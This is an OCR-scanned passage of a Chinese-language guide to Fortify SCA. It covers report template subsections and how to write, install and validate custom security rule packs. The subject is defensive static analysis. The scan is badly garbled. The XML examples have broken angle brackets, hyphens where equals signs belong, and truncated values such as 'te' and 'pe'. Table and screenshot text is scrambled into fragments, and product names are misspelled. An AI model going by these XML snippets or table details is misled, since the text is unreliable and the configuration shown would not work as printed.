«/Chart» 
«/IssueListing» 
«/SubSection» 
«/ReportSection» 


在 上 述 示 例 中 ，Results Outline 小 节 包含 两 个 子 小 节 。 第 一 个 子 小 节 是 名 为 Overall number of 
results 的 文本 子 小 节 。 第 二 个 子 小 节 是 名 为 Vulnerability Examples by Category 的 结果 列表 。 
一 个 小 节 的 内 容 可 包含 任何 子 小 节 的 组 合 。 

添加 报告 子 小 节 : 


1) 添加 文本 子 小 节 

在 文本 子 小 节 中 ， 可 包含 Title 标签 、Description 标签 和 Text 标签 。 在 Text 标签 中 ， 方 
便 用 户 可 以 在 生成 报告 之 前 编辑 其 中 的 内 容 ， 当 然 仍 可 以 提供 默认 内 容 。 以 下 是 Results 
Outline 小 节 中 Overall number of results 子 小 节 的 XML 代码 : 


<SubSection enabled="true"> 
«Title»Overall number of results</Title> 
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<Description>Results count</Description> 
<Text>The scan found $TOTAL FINDINGS$ issues.</Text> 
«/SubSection» 


在 上 述 示例 中 ， 该 文本 子 小 节 的 标题 为 Overall number of results。 用 于 介绍 该 文本 用 途 
的 说 明文 字 为 Results count。 用 户 可 在 运行 报告 之 前 编辑 text 字段 中 的 文字 ， 该 内 容 使 用 了 
一 个 名 为 STOTAL FINDINGSS$ 的 变量 。 


2) 添加 结果 列表 子 小 节 

在 结果 列表 子 小 节 中 ， 可 以 包含 Title 标签 、Description 标签 和 IssueListing 标签 。 在 
IssueListing 标签 中 ， 可 以 定义 limit 的 默认 内 容 ， 并 将 listing 设 为 te。 即便 用 户 可 以 在 生成 
报告 之 前 编辑 Refinement 标签 的 内 容 ， 仍 可 以 在 报告 中 包含 带 有 默认 语句 或 不 带 默认 语句 的 
标签 。 要 生成 结果 列表 ， 需 要 将 Chart 标签 的 chartType 属性 设 为 list。 还 可 以 定义 Axis 标签 。 
以 下 是 Results Outline 小 节 中 Vulnerabilities Examples by Category 子 小 节 的 XML 代码: 


«SubSection enabled="true"> 

«Title»Vulnerability Examples by Category«/Title» 

«Description»Results summary of the highest severity issues.Vulnerability 
examples are 

provided by category.«/Description» 

«IssueListing limit-"1" listing-"true"» 

«Refinement»severity: (3.0, 5.0] confidence: [4.0, 5.0]«/Refinement» 

«Chart chartType-"list"» 

«Axis»Category«/Axis» 

«/Chart» 

«/IssueListing» 

«/SubSection» 


在 上 述 示例 中 ， 结 果 列 表 子 小 节 的 标题 为 Vulnerability Examples by Category。 用 于 介绍 
该 文本 用 途 的 说 明文 字 为 “Results summary of the highest severity issues. Vulnerability examples 
are provided by category”。 该 子 小 节 将 会 为 每 种 包含 符合 severity:[3.0, 5.0] confidence:[4.0， 
5.0] (HI! Refinement 标签 的 值 ) 语 句 的 问题 类 别 ( 即 Axis 标签 的 值 ) 列 出 (listing=true) 一 个 问题 
(limit-"1"). 


3) 添加 图 表 子 小 节 

在 图 表 子 小 节 中 , 可 以 包含 Title 标签 ,Description 标签 和 IssueListing 标签 .在 IssueListing 
标签 中 ,可 定义 limit 的 默认 内 容 ， 并 将 listing 设 为 false。 即 便 用 户 可 以 在 生成 报告 之 前 编辑 
Refinement 标签 的 内 容 ， 仍 可 以 在 报告 中 包含 带 有 默认 语句 或 不 带 默认 语句 的 标签 。 要 生成 
一 个 饼 图 ， 需 要 将 Chart 标签 的 chartType 属性 设 为 pe。 提供 的 选项 包括 table. pie 和 bar. 
用 户 可 在 生成 报告 之 前 更 改 此 设置 。 还 可 定义 Axis 标签 。 

以 下 代码 显示 了 图 表 子 小 节 的 一 个 示例 。 

«SubSection enabled="true"> 

<Title>New Issues</Title> 


<Description>A list of issues discovered since the previous 
analysis</Description> 
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«Text»The following issues have been discovered since the lastscan:«/Text» 
XIssueListing limit-"-1" listing-"false"» 

X«Refinement /> 

«Chart chartType-"pie"» 

«Axis»New Issuec/Axis» 

«/Chart» 

«/IssueListing» 

«/SubSection» 


在 上 述 子 小 节 中 ， 图 表 (limit="-1" listing="false") 包 含 名 为 New Issues 的 标题 以 及 包含 
The following issues have been discovered since the last scan 内 容 的 文本 小 节 。 由 于 "Refinement" 
标签 为 空 , 该 图 表 将 会 包含 所 有 问题 , 并 按照 New Issue( 即 Axis 标签 的 值 ) 的 值 对 这 些 问 题 进 
行 分 组 。 该 图 表 将 显示 为 一 个 饼 图 (chartType="pie")。 


5.76 编写 自 定义 规则 


1. Fortify SCA 规则 概述 


默认 情况 下 ，Fortify SCA 使 用 安装 的 安全 编码 规则 包 用 来 检查 源 代码 ， 并 定义 一 系列 
可 能 出 现 的 问题 ， 如 可 被 攻击 者 利用 的 安全 漏洞 和 不 良 的 编程 实践 。 安 全 编码 规则 包 中 的 规 
pipes 支持 语言 的 核心 和 扩展 的 API 包 中 的 元 素 ， 并 将 分 析 结 果 记 录 在 Fortify SCA 
。 每 个 问题 的 解释 包含 了 对 问题 的 描述 和 建议 的 解决 方案 ， 用 以 保护 漏洞 免 受 攻击 和 修复 
ea 可 通过 创建 自 定义 规则 包 来 准确 地 分 析 特 定 的 应 用 程序 (其 中 包含 有 关 源 代 
码 元 素 附加 信息 的 规则 )， 验 证 专门 的 安全 规则 ， 以 及 细 化 Fortify SCA. 所 报告 的 问题 。 
要 编写 有 效 的 自 定义 规则 ,熟悉 已 知 的 安全 漏洞 类 别 和 通常 ee t 
常 重要 的 。 深 入 理解 各 类 经 常 出 现在 特定 类 型 漏洞 的 函数 有 利于 在 编写 自 定义 规则 过 程 中 能 
够 瞄准 与 安全 相关 的 函数 。 确 定 函数 的 安全 性 是 一 件 非常 复杂 的 事情 ， 然 而 事实 证 明 花 费 在 
学 习 函 数 类 型 与 漏洞 类 别 之 间 关 系 上 的 时 间 的 确 是 有 益 的 。 必 须 识别 与 安全 相关 的 函数 ， 并 
检查 它们 的 个 体 行为 (通过 检查 源 代码 , 或 借助 API 文档 ) 以 此 来 确定 能 够 体现 各 个 函数 具体 
行为 和 与 之 相关 的 漏洞 类 别 的 正确 规则 形式 。 一 旦 确定 好 了 这 种 联系 ， 使 用 自 定义 规则 编辑 
器 来 创建 规则 就 相对 简单 了 。 
2. 使 用 自 定 义 规 则 包 


1) 新 建 自 定义 规则 包 

创建 一 个 自 定义 规则 包 : 

a) 在 Audit( 审 计 ) 窗 口中 , 选择 File( 文 件 )， 再 选择 Open Custom Rules Editor( 打 开 自 定义 
规则 编辑 器 )。 屏 幕 上 将 显示 Fortify Audit Workbench Custom Rules Editor(Fortify Audit 
Workbench 自 定 义 规 则 编辑 器 ) 窗 口 。 

b) 选择 File( 文 件 ), 再 选择 New Rule Pack( 新 规则 包 )。 屏幕 上 将 显示 Create a New Folder 
(新 建 规则 包 ) 对 话 框 。 

c) 在 文件 名 栏 ， 输 入 规则 包 的 名 称 。 

d) 单 击 Save( 保 存 )。 在 Table View (表格 视图 ) 中 将 显示 一 个 新 的 自 定义 规则 包 。 
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2) 打开 Custom Rulepack( 自 定义 规则 包 ) 

可 以 在 不 打开 新 规则 的 情况 下 将 它 添加 到 现 有 的 规则 包 中 。 

打开 一 个 现 有 的 自 定义 规则 包 : 

a) 在 Audit( 审 计 ) 窗 口中, 选择 File( 文 件 )， 再 选择 Open Custom Rules Editor( 打 开 自 定义 
规则 编辑 器 )。 屏 幕 上 将 显示 Forüfy Audit Workbench Custom Rules Editor(Fortify Audit 
Workbench 自 定义 规则 编辑 器 ) 窗 口 。 

b) 选择 File( 文 件 ), 再 选择 Open Rulepack (打开 规则 包 )。 屏 幕 上 将 显示 Choose Rules File 
(选择 规则 文件 ) 对 话 框 。 

c) 选择 所 需 的 规则 包 ， 然 后 单 击 Open( 打 开 )。 在 Table View (表格 视图 ) 中 将 打开 一 个 新 
的 自 定义 规则 包 。 


3) 配置 规则 包 的 细节 

规则 包 信 息 可 以 定义 自 定义 规则 。 默认 的 规则 包 名 称 是 文件 名 。 Audit Workbench, Fortify 
SCATeam Server 和 Fortify Manager 可 以 通过 显示 Rulepack/Name( 规 则 /名 称 ) 元 素 帮 助 用 户 定 
义 特定 的 规则 包 。 

设置 自 定义 规则 包 的 细节 : 

a) 在 Audit( 审 计 ) 窗 口中 ， 选 择 File( 文 件 )， 再 选择 Open Rulepack( 打 开 规则 包 )。 屏 幕 上 
将 显示 Choose Rules File( 选 择 规则 文件 ) 对 话 框 。 

b) 选择 所 需 的 文件 ， 然 后 单 击 Open( 打 开 )。 在 Table View( 表 格 视图 ) 中 将 显示 一 个 新 的 
自 定义 规则 。 

c) 单 击 XML View(XML 视图 ) 选 项 卡 。 

设置 规则 包 细 节 ， 如 下 所 示 : 

TE Name (名 称 ) 元 素 中 的 CDATA 的 括号 内 输入 定义 规则 包 的 名 称 。 

在 Description (描述 ) 元 素 中 的 CDATA 的 括号 内 输入 对 规则 包 的 简短 描述 。 

d) 单 击 File( 文 件 )， 再 单 击 Save Rulepack( 保 存 规则 包 )。 可 以 更 改 规则 包 的 名 称 和 描述 。 
规则 包 细 节 的 示例 : 


<Name><! [CDATA [myCompany's Security Rules]]></Name> 
«Description»«! [CDATA[Enforces security guide lines.]]»«/Description» 


4) 安装 自 定义 规则 包 
默认 情况 下 ，Fortify SCA 通过 使 用 自 定义 规则 目录 中 的 所 有 可 以 找 得 到 的 自 定义 规则 
包 来 分 析 代 码 。 自 定义 规则 目录 的 位 置 : 


«install directory>/Core/config/ssm.properties 


创建 一 个 自 定义 规则 包 : 

a) 在 Audit( 审 计 ) 窗 口中 ， 选 择 Options( 选 项 )， 再 选择 Options( 选 项 )。 屏 幕 上 将 显示 
Options (选项 ) 窗 口 。 

b) 选择 Rulepack Management( 规 则 包 管 理 )。 屏 幕 上 将 显示 Ruelpack Management( 规 则 包 
管理 ) 面 板 。 
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c) 单 击 Import Rulepacks( 导 入 规则 包 )。 屏 幕 上 将 显示 Select Rulepack( 选 择 规则 包 ) 对 
话 框 。 

d) 选择 所 需 的 自 定义 规则 包 ， 然 后 单 击 Open( 打 开 )。 自 定义 规则 包 的 副本 会 保存 在 自 
定义 规则 目录 中 。 


3. 使 用 自 定义 规则 向 导 


通过 自 定义 规则 ， 可 以 分 析 第 三 方 和 专 有 的 库 ， 发 现 无 法 扫描 到 的 源 代码 信息 以 及 针对 
可 能 被 安全 编码 规则 包 视 为 问题 的 元 素 编写 相关 的 规则 。 

使 用 向 导 编写 新 规则 : 

1) 在 Audit( 审 计 ) 窗 口中 , 选择 File( 文 件 ), 再 选择 Open Custom Rules Editor( 打 开 自 定义 
规则 编辑 器 )。 屏 幕 上 将 显示 Fortify Audit Workbench Custom Rules Editor(Fortify Audit 
Workbench 自 定义 规则 编辑 器 ) 窗 口 。 

2) 选择 File( 文 件 )， 再 选择 New Rule( 新 规则 )。 屏 幕 上 会 显示 Rules Wizard (规则 向 导 )。 

3) 选择 所 需 的 规则 类 型 。 向 导 会 提示 输入 有 关 选 定 规则 类 型 的 各 种 信息 。 

4) 在 每 个 窗口 输入 所 需 信 息 ， 然 后 单 击 Next( 下 一 步 )。 屏 幕 上 会 显示 Successful Rule 
Generation( 规 则 生成 成 功 ) 窗 口 。 

5) 按照 如 下 方式 将 新 规则 添加 到 规则 包 : 选择 New Rule will be inserted into an already 
open file( 将 新 规则 插入 到 已 打开 的 文件 )， 然 后 选择 所 需 的 自 定义 规则 包 。 选 择 New Rule will 
be saved to( 将 新 规则 保存 至 )， 单 击 Browse( 浏 览 )， 然 后 选择 所 需 的 自 定义 规则 包 。 

6) 选择 Show XML source for the new rule( 新 规则 显示 XML 源 代码 )。 

7) 单 击 Finish( 完 成 )。 

8) 规则 被 添加 到 规则 包 中 。 自 定义 规则 编辑 器 所 显示 的 规则 包 中 会 包含 以 XML 视图 
方式 显示 的 新 规则 。 

9) 选择 File( 文 件 )， 再 选择 Save Rulepack( 保 存 规 则 包 )。 规 则 被 保存 到 规则 包 中 。 

4. 编辑 和 删除 规则 


编辑 规则 : 

1) 选择 需要 编辑 的 规则 。 

2) 单 击 Details( 详 细 信 息 )。 屏 幕 上 会 显示 Rule Details Editor( 规 则 细节 编辑 器 )。 

3) 更 改 Rule Parameters and Rule Description (规则 参数 和 规则 描述 ) 面 板 所 需 的 信息 。 
4) 单 击 OK( 确 定 )。 

删除 规则 : 

1) 选择 需要 删除 的 规则 。 

2) 单 击 Delete( 删 除 )。 屏 幕 上 会 出 现 一 个 对 话 框 ， 询 问 是 否 删除 。 

3) 单 击 Yes( 是 ) 删 除 该 规则 ， 或 单 击 No( 否 ) 取 消 删除 。 


5. 在 XML 视图 中 编写 规则 
通过 自 定义 规则 ， 可 以 分 析 第 三 方 和 专 有 的 库 ， 发 现 无 法 使 扫描 到 的 源 代 码 信息 以 及 针 
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对 可 能 被 安全 编码 规则 包 视 为 问题 的 元 素 编写 相关 的 规则 。 

。 插入 XML 模板 

1) 在 Custom Rules Editor( 自 定义 规则 编辑 器 ) 中 ， 打 开 自 定义 规则 包 。 在 Fortify Audit 
Workbench Custom Rules Editor(Fortify Audit Workbench 自 定义 规则 编辑 器 ) 窗 口中 会 显示 
Table View( 表 格 视图 )。 

2) 单 击 XML View(XML 视图 )。 

3) 右键 单 击 RuleDefinitions( 规 则 定义 ) 标 签 。 

4) 选择 Insert Rule Template( 插 入 规则 模板 ) - <template name>. template name 适用 于 
«install directory>/Core/config/ruletemplates/rules 中 的 所 有 模板 。 规 则 中 会 插入 所 有 需要 的 
元 素 


5) 在 属性 和 元 素 中 输入 规则 信息 完成 规则 。 必 填 的 元 素 和 属性 会 以 栏 中 的 红色 和 标识 。 
6) 完成 后 ， 选 择 File( 文 件 )， 再 选择 Save Rulepack( 保 存 规则 包 )。 
。 创建 自 定义 规则 模板 
自 定义 规则 模板 是 带 有 常规 规则 定义 组 件 的 XML 文件 。 可 以 修改 现 有 的 模板 或 创建 自 
己 的 模板 。 

创建 模板 : 

1) 在 Custom Rules Editor ( 自 定义 规则 编辑 器 ) 的 XML 视图 中 复制 规则 定义 。 

2) 将 规则 粘贴 到 文本 文件 中 。 

3) 用 希望 显示 在 Insert Rule Template (插入 规则 模板 ) 中 的 名 称 命名 文件 ， 并 将 其 保存 在 
下 面 的 目录 中 : 
<install_directory>/Core/config/ruletemplates/rules 文件 名 将 显示 在 可 用 模板 列表 中 。 
6. 配置 自 定义 规则 元 素 


1) 定义 规则 信息 

规则 信息 的 识别 也 可 以 在 其 他 过 程 实现 ， 如 Project Summary( 项 目 摘要 ) 面 板 中 的 
AuditWorkbench Audit Issue Details( 审 计 问题 细节 ) 选 项 卡 。 设 置 语言 是 必需 的 ， 指 定 标签 和 指 
定 注意 事项 是 可 选 的 。 

a) 设置 语言 

规则 是 特定 语言 。 必 须 设 置 语言 属性 。 格 式 版 本 号 属性 指定 了 规则 版 本 号 。 当 前 安全 编 
码 规则 包 版 本 号 是 3.4。 以 下 示例 显示 了 用 于 Java 的 3.4 版 本 的 语义 规则 : 


<SemanticRule formatVersion-"3.4" language-"java"» 
b) 添加 标签 


将 在 输出 中 包含 允许 输入 文字 的 标签 元 素 。 比 如 ， 标 签 文字 将 显示 在 Analysis Trace( 分 
析 跟 踪 ) 面 板 中 。 输 入 字 串 设置 标签 ， 如 : 


XLabel»Company Rule<Label> 


c) 添加 笔记 
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使 用 笔记 标签 ， 可 以 输入 任何 相关 信息 或 关于 新 规则 的 评论 。 笔 记 仅 显示 在 XML 视图 
中 。 如 下 例 所 示 ， 在 CDATA 的 括号 中 输入 文本 : 


<Notes><! [CDATA [Enforces corporate security policies.]]></Notes> 


2) 定义 自 定义 规则 描述 

可 以 写 下 新 规则 描述 ， 可 以 在 选择 Details and Recommendations (细节 和 建议 ) 选 项 卡 时 
获得 该 描述 。 描 述 提供 关于 决定 漏洞 的 标准 和 修正 漏洞 的 补救 方案 的 信息 。 

a) 编写 概要 

在 概要 元 素 中 输入 对 问题 的 描述 ， 该 描述 被 设计 作为 一 个 摘要 提供 给 对 分 类 (category) 
未 必 熟 悉 的 审计 员 的 。 这 个 描述 不 应 试图 解释 分 类 ， 而 应 提供 一 个 对 本 身 性 质 的 尽 可 能 多 的 
提示 。 这 段 文本 会 在 一 些 狭 窗 的 空间 出 现 ， 所 以 它 不 应 超过 10 个 单词 。 

如 以 下 例子 所 示 ， 概 要 元 素 中 的 文字 必须 使 用 CDATA 括号 : 

«Abstract» 


«![CDATA[Enter a description of the issue that the rule matches.]]» 
«/Abstract» 


b) 编写 解释 

解释 元 素 中 的 文字 显示 在 Details( 细 节 ) 选 项 卡 中 。 包 括 对 漏洞 的 深入 讨论 ， 与 漏洞 相伴 
的 典型 构造 ， 漏 洞 会 如 何 被 利用 ， 以 及 可 能 发 动 攻击 的 范畴 。 

如 下 例 所 示 ， 概 要 元 素 中 的 文字 必须 使 用 CDATA 括号 ; 

«Explanation» 


«![CDATA[Enter a detailed explanation on vulnerability.]]» 
«/Explanation» 


c) 编写 建议 
建议 元 素 中 的 文字 显示 在 Recommendation (建议 ) 选 项 卡 中 。 该 文字 应 解释 如 何 修复 漏洞 。 
«Recommendations» 


<! [CDATA [Enter instructions on how to fix the issue.]]» 
«/Recommendations» 


d) 编写 提示 

提示 元 素 中 的 文字 显示 在 Recommendation( 建 议 ) 选 项 卡 中 。 包括 普 遍 或 困难 的 审计 情况 
的 范例 ， 带 有 如 何 鉴别 特定 问题 的 小 提示 。 随 着 在 真实 审计 中 新 情况 的 发 现 ， 这 个 部 分 的 内 
容 应 该 逐渐 增多 。 小 提示 应 该 是 真实 的 ， 并 对 努力 要 搞 清 楚 一 份 source code analysis. 结果 的 
人 有 帮助 。 

<Tips> 

<! [CDATA [Enter a tip.]]» 

</Tips> 

3) 定义 领域 、 类 别 和 严重 性 

当 编 写 以 下 规则 类 型 时 ， 请 设置 领域 (可 选 ) 、 类 别 和 严重 性 : 
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Configuration 
Control Flow 
Data Flow Sink 
Semantic 
Structural 


a) 使 用 自 定义 规则 向 导 

在 自 定义 规则 向 导 中 ， 请 选择 以 下 的 漏洞 信息 : 

类 别 : 选择 一 个 类 别 或 输入 与 此 规则 匹配 的 一 个 事件 的 新 类 别 (最 多 255 个 字符 )。 

列表 显示 出 用 于 安装 的 自 定义 和 安全 编码 规则 包 的 规则 的 类 别 ; 

严重 性 : 为 与 此 规则 相符 合 的 事件 设置 severity( 严 重 ) 属 性 , 可 选择 Low( 低 )、Medium( 中 )、 
High( 高 ) 或 severity( 严 重 )。 

b) 使 用 XML View (XML 视图 ) 

在 XML View(XML 视图 ) 中 为 表 5-11 中 的 标签 设置 规则 信息 值 。 


表 5-11_ 自 定义 规则 信息 字段 


对 漏洞 的 分 类 和 分 级 ， 如 Buffer Overflow 或 者 SQL Injection 


显示 漏洞 重要 性 级 别 的 范围 ， 从 1.0 到 5.0 
漏洞 所 属 的 领域 
漏洞 类 别 的 子 类 别 


注意 : 按 下 CtrltSpace 会 列 出 用 于 本 地 安装 的 安全 编码 规则 包 和 自 定义 规则 包 的 规则 类 
型 的 值 ， 如 图 5-47 所 示 。 


Vulnerability Information 


Enter the category, severity, accuracy, impact, remediation effort, and probability of 
Category: (Valid Name) 中 


图 5-47” 自 定义 规则 向 导 : 类 别 和 严重 性 屏幕 
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4) 定义 函数 

a) 使 用 自 定义 规则 向 导 

如 图 5- 48 所 示 , 使 用 Java 风格 正则 表达 式 以 识别 在 Function Information( 函 数 信息 ) 窗 口 
中 与 所 有 规则 类 型 相符 的 函数 。 以 下 将 适用 于 除了 配置 与 别名 之 外 的 所 有 规则 类 型 中 : 

数据 包 : 如 果 已 定义 将 触发 当前 规则 的 函数 ， 请 输入 与 命名 空间 或 数据 包 相 符 的 正则 表 
达 式 。 

类 别 : 如果 已 定义 会 触发 当前 规则 的 函数 ， 请 输入 与 类 别 相符 的 正则 表达 式 。 

函数 : 为 触发 当前 规则 的 函数 或 方法 输入 正则 表达 式 。 

注意 : 别名 规则 用 于 定义 窗口 中 的 函数 ， 将 在 下 一 节 描 述 别 名 规则 。 


Fuente 0 


Sink Function Information 
EARSENS, — 


Enter Information about the function that the data cannot end in 


Package: (Regular Expression) 


Class: (Regular Expression) 
Function: (Regular Expression) (*) 


Information 
Enter Information about the function that the data cannot end in 


图 5-48 FE OUI] S. 函数 信息 窗口 


b) 使 用 XML View (XML 视图 ) 
定义 命名 空间 、 类 别 和 函数 
FunctionIdentifier 元 素 用 于 识别 应 用 规则 的 函数 ， 如 表 5-12 所 示 。 
R 5-12 识别 XML 中 的 函数 
jü 述 
如 果 已 定义 将 触发 当前 规则 的 函数 ， 请 输入 与 命名 
空间 或 数据 包 精 确 匹 配 的 字符 串 


TEXT string 
NamespaceName 
"mM 如 果 已 定义 将 触发 规则 的 函数 ， 请 输入 与 命名 空间 
tt 
mE 或 数据 包 名 称 相符 的 正则 表达 式 


元 素 名称 
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( 续 表 ) 
元 素 名 称 内 容 d 述 
AUT 如 果 已 定义 将 触发 规则 的 函数 ， 请 输入 与 类 别 精确 
匹配 的 字符 串 
ClassName 
如 果 已 定义 会 触发 规则 的 函数 ， 请 输入 与 类 别 相符 
Pattern 
的 正则 表达 式 
TEXT 输入 能 够 触发 规则 的 函数 或 方法 的 名 称 
FunctionName 
Pattern 输入 与 触发 规则 的 函数 名 称 相符 的 正则 表达 式 


。 识别 并 定义 函数 参数 

定义 函数 参数 可 以 限制 这 样 的 规则 ， 即 与 那些 有 其 他 特定 值 的 函数 相 匹配 并 符合 某 一 个 
签名 (参数 列表 ) 的 函数 。 限 制 函 数 基于 签名 触发 规则 在 语言 中 十 分 有 用 ， 人 允许 具有 相同 名 字 
函数 的 定义 能 够 重 载 ， 以 便 接 受 不 同 参数 。 

如 表 5-13 所 示 ， 在 参数 元 素 中 定义 函数 的 参数 : 


表 5-13 ES 


* * [a s rar E 


Parameters | varArg | oe | welfatse | 用 于 识别 函数 是 否 具有 参数 的 变量 数 

字符 串 和 那些 在 特定 函数 中 定义 的 参数 类 型 相 
对 应 。 空 的 或 未 识别 元 素 将 指引 Fortify SCA 不 受 
任何 限制 地 与 任何 方法 或 函数 签名 相 匹配 

整数 代表 了 匹配 的 任意 类 型 参数 的 最 小 数量 ， 出 
现在 特定 函数 的 签名 的 最 后 

整数 代表 了 匹配 的 任意 类 型 参数 的 最 小 数量 ， 出 
现在 特定 函数 的 签名 的 最 后 


ParamType 


WildCarda 


T. 验证 自 定义 规则 


验证 自 定义 规则 包 : 创建 简单 的 测试 代码 来 验证 所 编写 的 规则 ， 并 将 新 的 自 定义 规则 保 
存 到 测试 规则 包 中 。 使 用 Fortify SCA 仅 根 据 新 的 自 定义 规则 来 扫描 测试 代码 。 

注意 : 验证 规则 时 ， 通 过 选择 Options( 选 项 )， 然 后 选择 Show Hidden( 显 示 隐 藏 )、Show 
Removed( 显 示 删 除 ) 和 Show Suppressed (显示 废除 ) 来 显示 所 有 问题 。 

。 使 用 新 的 自 定义 规则 进行 扫描 

本 节 将 介绍 如 何 使 用 测试 自 定义 规则 包 来 扫描 项 目 。 确 保 测试 自 定义 规则 包 中 仅 包含 希 
望 测试 的 规则 。 在 验证 一 个 清晰 的 规则 时 ， 首 先 使 用 安全 编码 规则 包 扫 描 项 目 ， 然 后 使 用 自 
定义 规则 包 和 安全 编码 规则 包 再 扫描 一 次 。 在 使 用 某 个 函数 且 问 题 已 被 删除 的 上 下 文中 验证 
规则 是 否 与 该 函数 匹配 。 
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使 用 新 的 自 定义 规则 扫描 源 代码 : 

1) 创建 简单 的 源 文件 ， 其 中 的 代码 与 其 文件 夹 中 的 规则 匹配 。 

2) 打开 Audit Workbench, 单 击 Advanced Scan( 高 级 扫描 )。 屏 幕 上 会 显示 Browse for Root 
Directory( 浏 览 根 目 录 ) 窗 口 。 

3) 选择 包含 源 文件 的 文件 夹 ， 然 后 单 击 OK( 确 定 )。 屏 幕 上 会 显示 Commandline Builder 
(命令 行 构建 器 ) 对 话 框 。 

4) 如 果 是 Java 项 目 ， 选 择 根 文件 夹 ， 然 后 单 击 Classpath Directory( 类 路 径 目 录 )。 

5) 单 击 Next( 下 一 步 )。Commandline Builder: Stages of Fortify SCA Analysis( 命 令 行 构建 
器 : Fortify SCA Analysis 操作 步骤 ) 窗 口 会 显示 在 屏幕 上 。 

6) 单 击 Manage Rulepacks( 管 理 规则 包 )。 

7) 如 果 未 安装 测试 自 定义 规则 包 , 单 击 Add Custom Rulepack( 添 加 自 定义 规则 包 )， 然 后 
安装 规则 包 。 

8) 清除 所 有 安全 编码 规则 包 并 自 定义 规则 包 ( 测 试 包 除外 )。 

注意 : 在 测试 清晰 的 规则 时 ， 使 用 安全 编码 规则 包 和 自 定 义 规则 包 进 行 扫描 。 

9) 单 击 OK( 确 定 )。 

10) 单 击 Run Scan( 运 行 扫描 )。 

FPR 文件 会 显示 在 Audit( 审 计 ) 窗 口中 。 

验证 函数 是 否 与 规则 匹配 ，Fortify SCA 将 规则 与 函数 一 一 匹配 。 利 用 这 些 说 明 来 确保 
规则 能 够 匹配 所 有 和 希望 匹配 的 函数 ， 即 使 是 规则 类 型 可 能 从 结果 中 删除 了 问题 。 

以 下 规则 类 型 可 能 不 会 产生 问题 : 

Cleanse or validation rules: 删除 经 由 函数 的 数据 中 的 感染 标识 ; 

Source rules: 为 从 该 函数 返回 的 数据 添加 一 个 或 多 个 感染 标识 。 这 些 规则 可 能 /不 可 能 产 
生 问 题 ; 

Sink rules: 将 带 有 特定 感染 标识 的 数据 到 达 函 数 的 情况 识别 为 问题 。 

查看 匹配 函数 的 规则 : 

1) 在 函数 面板 中 ， 选 择 Show All( 显 示 全 部 ) 和 Group by function( 按 函数 分 组 )。 

屏幕 上 会 显示 源 代码 中 的 所 有 函数 。 

2) 验证 规则 是 否 正 确 匹 配 了 函数 : 

a) 右键 单 击 函数 ， 然 后 选择 Show Matched Rules( 显 示 匹 配 的 规则 )。 屏 幕 上 会 显示 
Matched Rules( 匹 配 的 规则 ) 窗 口 。 它 会 显示 匹配 该 函数 的 所 有 规则 。 

b) 定位 测试 中 的 自 定义 规则 的 规则 ID. 

c) 单 击 OK( 确 定 ) 以 关闭 窗口 。 

d) 对 规则 所 需 匹 配 的 每 一 个 函数 执行 同样 的 操作 。 

3) 要 查看 函数 的 使 用 位 置 ， 右 键 单 击 函数 ， 然 后 选择 Find Usages( 查 找 使 用 )。 

Search Results( 搜 索 结 果 ) 选 项 卡 会 显示 该 函数 的 位 置 列表 。 其 中 包括 文件 的 路 径 和 函数 

使 用 的 代码 行 数 。 

注意 : 这 是 验证 规则 匹配 所 需 函 数 的 最 准确 方式 。 
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4) 单 击 函数 的 位 置 以 在 代码 导航 面板 中 显示 该 函数 。 

列 出 规则 报告 的 各 个 问题 : 这 部 分 说 明 介 绍 了 如 何 查 找 和 验证 与 特定 规则 相 匹 配 的 问题 。 

查找 匹配 某 一 规则 的 所 有 问题 : 

1) 在 Issues (问题 ) 面 板 中 ， 单 击 All( 全 部 ) 选 项 卡 。 

2) 在 Group by (分 组 方式 ) 中 ， 选 择 New Issues( 新 问题 )。 屏 幕 上 会 显示 新 问题 列表 。 

3) 选择 所 需 问 题 ， 然 后 单 击 Details( 详 细 信息 ) 选 项 卡 。 

4) 滚动 至 末尾 ， 然 后 复制 规则 ID. 

5) 在 Search( 搜 索 ) 字 段 中 ， 输 入 mleid: 然后 立即 粘贴 规则 ID. Bu: 
ruleid:97B9518A-F1BC-44CE-BEB1-D5FBDDFCCF9D. 

6) fü Enter 键 ， 屏 幕 上 会 显示 所 有 与 搜索 标准 相 匹配 的 问题 。 

7) 验证 规则 是 否 报告 了 所 需 问题 的 类 型 和 数目 。 

列 出 从 扫描 中 删除 的 问题 : 发 现在 扫描 期 间 删除 问题 的 规则 并 非 易 事 ， 这 部 分 说 明 介绍 
了 如 何 显示 所 有 在 扫描 期 间 删除 的 问题 。 要 显示 准备 删除 的 项 ， 需 要 首先 使 用 安全 编码 规则 
包 扫 描 代 码 , 然后 使 用 安全 编码 规则 包 和 自 定义 的 规则 包 ( 包 含 验 证 规则 ) 扫 描 相同 的 代码 库 。 

查找 删除 的 问题 : 

1) 在 Issues( 问 题 ) 面 板 中 ， 单 击 All( 全 部 ) 选 项 卡 。 

2) 在 Group by( 分 组 方式 ) 中 ， 选 择 Removed Issues( 删 除 问 题 )。 

屏幕 上 会 显示 此 扫描 和 最 后 一 个 扫描 之 间 的 问题 列表 。 

自 定义 规则 包 的 疑难 解答 : 

扫描 时 报告 的 语法 错误 : 如 果 以 下 错误 发 生 在 通过 新 规则 运行 扫描 的 过 程 中 ， 在 XML 
View(XML 视图 ) 中 打开 规则 ， 并 验证 规则 的 每 一 个 元 素 信息 是 否 完整 。 错 误 表示 规则 的 格式 
无 效 。 

[1380] Rule "11F48876-58A8-4A48-8D78-C52E9295DC7E" :语法 错误 。 


检查 扫描 错误 和 和 警告; 

1) 选择 Tools( 工 具 )， 再 选择 Project Summary( 项 目 汇总 )。 

2) 在 Project Summary( 项 目 汇总 ) 面 板 中 ， 单 击 Analysis Information( 分 析 信 息 ) 选 项 卡 ， 
如 图 5-49 所 示 。 

3) 单 击 Wamings( 和 警告 ) 选 项 卡 。 屏 幕 上 会 显示 扫描 警告 和 错误 。 

预期 的 问题 未 显示 : 自 定义 规则 可 能 不 匹配 ， 原 因 如 下 : 

函数 或 方法 、 类 和 包 或 命名 空间 的 类 型 与 函数 在 代码 中 的 使 用 方式 不 匹配 ; 

由 源 规则 添加 的 TAINT 标识 与 sink 规则 中 的 TAINT 标识 条 件 不 匹配 ; 

TAINT 标识 被 pass-through 规则 意外 删除 ; 

匹配 这 个 问题 的 可 见 性 过 滤器 。 选 择 Options( 选 项 )， 然 后 选择 Show Hidden Issues( 显 示 
隐藏 问题 )。 在 All( 全 部 ) 选 项 卡 中 ， 选 择 Group by <none>( 任 意 分 组 )， 右 键 单 击 该 问题 ， 然 
